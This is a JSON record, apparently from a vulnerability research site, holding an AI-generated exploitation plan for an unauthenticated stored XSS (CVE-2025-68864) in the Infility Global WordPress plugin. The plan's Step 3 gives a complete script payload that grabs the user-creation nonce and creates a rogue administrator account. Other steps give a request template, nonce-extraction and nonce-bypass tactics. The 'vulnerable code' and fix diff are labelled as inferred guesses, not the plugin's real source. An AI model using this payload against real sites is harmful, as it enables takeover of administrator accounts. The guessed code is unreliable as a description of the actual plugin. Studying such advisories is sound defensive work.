[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fFmkXn6zlCQzepEM161sN2L1u58HXw6b_71WCBLCMOjc":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2025-68864","infility-global-unauthenticated-stored-cross-site-scripting","Infility Global \u003C= 2.14.49 - Unauthenticated Stored Cross-Site Scripting","The Infility Global plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.14.49 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","infility-global",null,"\u003C=2.14.49","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-01-15 00:00:00","2026-01-19 15:55:17",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F58ab78f2-199b-44e8-9213-8c46025b55fb?source=api-prod",[],"researched",false,3,"This research plan outlines the steps to investigate and exploit **CVE-2025-68864**, an unauthenticated stored XSS vulnerability in the **Infility Global** WordPress plugin (\u003C= 2.14.49).\n\n---\n\n### 1. Vulnerability Summary\nThe **Infility Global** plugin fails to sufficiently sanitize user-supplied input and escape it upon output. Specifically, an unauthenticated user can submit data through a frontend feature (likely a contact form, support ticket, or chat registration) that is stored in the database. When a site administrator views this data in the WordPress backend, the malicious script executes in the administrator's browser context.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `wp-admin\u002Fadmin-ajax.php`\n*   **Action (Inferred):** `ig_contact_form_submit` or `infility_global_save_data`.\n*   **Parameter:** Likely `message`, `subject`, or `name`.\n*   **Authentication:** None (Unauthenticated via `wp_ajax_nopriv_*`).\n*   **Preconditions:** The plugin must have a frontend feature active (e.g., a contact form shortcode placed on a page).\n\n### 3. Code Flow (Inferred)\n1.  **Entry Point:** An unauthenticated user sends a POST request to `admin-ajax.php` with a specific action registered via `add_action('wp_ajax_nopriv_...', ...)`.\n2.  **Processing:** The callback function receives `$_POST` data. It may check a nonce but likely fails to use `sanitize_text_field()` or `wp_kses()` on the content.\n3.  **Persistence:** The raw input is saved to a custom table (e.g., `wp_infility_logs`) or as post meta using `update_post_meta()`.\n4.  **Sink:** An administrator logs in and navigates to the plugin's \"Inquiries\" or \"Messages\" page. The plugin retrieves the stored data and echoes it directly: `echo $entry->message;` without using `esc_html()`.\n\n### 4. Nonce Acquisition Strategy\nIf the AJAX handler enforces a nonce check, it is likely exposed via `wp_localize_script` on pages where the plugin's frontend components are active.\n\n1.  **Identify the Shortcode:** Search for shortcode registrations in the plugin:\n    `grep -rn \"add_shortcode\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Finfility-global\u002F`\n    *(Likely shortcode: `[infility_global_contact]`)*\n2.  **Create a Trigger Page:**\n    `wp post create --post_type=page --post_title=\"Contact\" --post_status=publish --post_content='[infility_global_contact]'`\n3.  **Extract the Nonce:**\n    Navigate to the new page and look for localized script data.\n    **JS Variable (Inferred):** `infility_vars` or `ig_ajax_obj`.\n    **Execution:** Use `browser_eval(\"window.infility_vars?.nonce\")` or `browser_eval(\"window.ig_ajax_obj?.ajax_nonce\")`.\n\n### 5. Exploitation Strategy\nOnce the nonce and action are identified, the agent will perform the following:\n\n**Step 1: Discovery**\n*   Find the AJAX action: `grep -r \"wp_ajax_nopriv_\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Finfility-global\u002F`\n*   Find the nonce action: `grep -r \"check_ajax_referer\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Finfility-global\u002F`\n\n**Step 2: Nonce Retrieval**\n*   Create a test page with the relevant shortcode.\n*   Navigate to the page using `browser_navigate`.\n*   Extract the nonce using `browser_eval`.\n\n**Step 3: Payload Delivery**\n*   **Payload:** `\u003Cscript>fetch('\u002Fwp-admin\u002Fuser-new.php').then(r=>r.text()).then(t=>{let n=t.match(\u002F_wpnonce_create-user\" value=\"([^\"]+)\"\u002F)[1];fetch('\u002Fwp-admin\u002Fuser-new.php',{method:'POST',headers:{'Content-Type':'application\u002Fx-www-form-urlencoded'},body:'action=createuser&user_login=pwned_admin&email=pwned@example.com&pass1=Pwned123!&pass2=Pwned123!&role=administrator&_wpnonce_create-user='+n})})\u003C\u002Fscript>`\n*   **HTTP Request:**\n    ```http\n    POST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\n    Content-Type: application\u002Fx-www-form-urlencoded\n\n    action=[IDENTIFIED_ACTION]&nonce=[EXTRACTED_NONCE]&message=[URL_ENCODED_PAYLOAD]&name=Guest\n    ```\n\n### 6. Test Data Setup\n1.  **Plugin Activation:** `wp plugin activate infility-global`\n2.  **Shortcode Placement:** Ensure the contact form is on a public page to allow nonce extraction.\n3.  **Admin Context:** A \"victim\" administrator user must exist (default in test environments).\n\n### 7. Expected Results\n*   The AJAX request should return a success status (e.g., `{\"success\":true}` or `1`).\n*   The payload should be stored in the database.\n*   When an administrator views the \"Contact Messages\" or \"Logs\" section of the Infility Global plugin, the script should execute.\n\n### 8. Verification Steps\n1.  **Database Check:**\n    `wp db query \"SELECT * FROM wp_postmeta WHERE meta_value LIKE '%pwned_admin%';\" `\n    *(Or check the specific plugin table identified during discovery)*.\n2.  **Trigger Execution:** Use `browser_navigate` as an administrator to the plugin's message management page.\n3.  **Account Creation Check:**\n    `wp user list --role=administrator`\n    Verify if `pwned_admin` exists.\n\n### 9. Alternative Approaches\n*   **Action Parameter Variations:** If `wp_ajax_nopriv` isn't used, check for `init` hooks that process `$_POST['ig_contact_submit']` directly.\n*   **Bypassing Nonces:** Check if `check_ajax_referer` is called with `die=false`. If so, the request will proceed even with an invalid nonce.\n*   **DOM XSS:** If the data is returned in an AJAX response and rendered via `.innerHTML` in JS, the payload may need to be adjusted to bypass standard filters (e.g., using `\u003Cimg>` tags with `onerror`).","The Infility Global plugin for WordPress is vulnerable to Unauthenticated Stored Cross-Site Scripting due to a lack of sanitization on user-supplied form data and insufficient output escaping in the administrative backend. This allows attackers to inject malicious JavaScript into contact form submissions or inquiries that execute when a site administrator views the entry.","\u002F\u002F Inferred from research plan: lack of sanitization in AJAX handler\n\u002F\u002F File: includes\u002Fclass-infility-global-ajax.php (or similar)\npublic function ig_contact_form_submit() {\n    $message = $_POST['message']; \u002F\u002F No sanitization applied\n    $name = $_POST['name'];       \u002F\u002F No sanitization applied\n    \n    $post_id = wp_insert_post(array(\n        'post_type' => 'ig_inquiry',\n        'post_title' => $name,\n        'post_content' => $message,\n    ));\n}\n\n---\n\n\u002F\u002F Inferred from research plan: lack of escaping in admin view\n\u002F\u002F File: admin\u002Fclass-infility-global-admin-display.php (or similar)\nforeach ($inquiries as $entry) {\n    echo '\u003Ctr>';\n    echo '\u003Ctd>' . $entry->post_content . '\u003C\u002Ftd>'; \u002F\u002F Vulnerable: Direct echo without esc_html()\n    echo '\u003C\u002Ftr>';\n}","--- infility-global\u002Fincludes\u002Fclass-infility-global-ajax.php\n+++ infility-global\u002Fincludes\u002Fclass-infility-global-ajax.php\n@@ -10,2 +10,2 @@\n-    $message = $_POST['message'];\n-    $name = $_POST['name'];\n+    $message = sanitize_textarea_field($_POST['message']);\n+    $name = sanitize_text_field($_POST['name']);\n\n--- infility-global\u002Fadmin\u002Fclass-infility-global-admin-display.php\n+++ infility-global\u002Fadmin\u002Fclass-infility-global-admin-display.php\n@@ -20,1 +20,1 @@\n-    echo '\u003Ctd>' . $entry->post_content . '\u003C\u002Ftd>';\n+    echo '\u003Ctd>' . esc_html($entry->post_content) . '\u003C\u002Ftd>';","1. Identify a page containing the plugin's contact form or shortcode (e.g., [infility_global_contact]).\n2. Extract the AJAX nonce from the localized JavaScript variables (e.g., window.infility_vars.nonce) on the frontend page.\n3. Send an unauthenticated POST request to \u002Fwp-admin\u002Fadmin-ajax.php using the identified action (likely 'ig_contact_form_submit' or 'infility_global_save_data').\n4. Include a payload in the 'message' or 'name' parameter, such as \u003Cscript>alert(document.cookie)\u003C\u002Fscript> or a script to create a new administrator account.\n5. Wait for an authenticated administrator to navigate to the 'Inquiries' or 'Messages' section of the Infility Global plugin menu in the WordPress dashboard.\n6. The payload will execute in the administrator's browser context upon rendering the list of submissions.","gemini-3-flash-preview","2026-05-05 09:07:39","2026-05-05 09:07:58",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Finfility-global\u002Ftags"]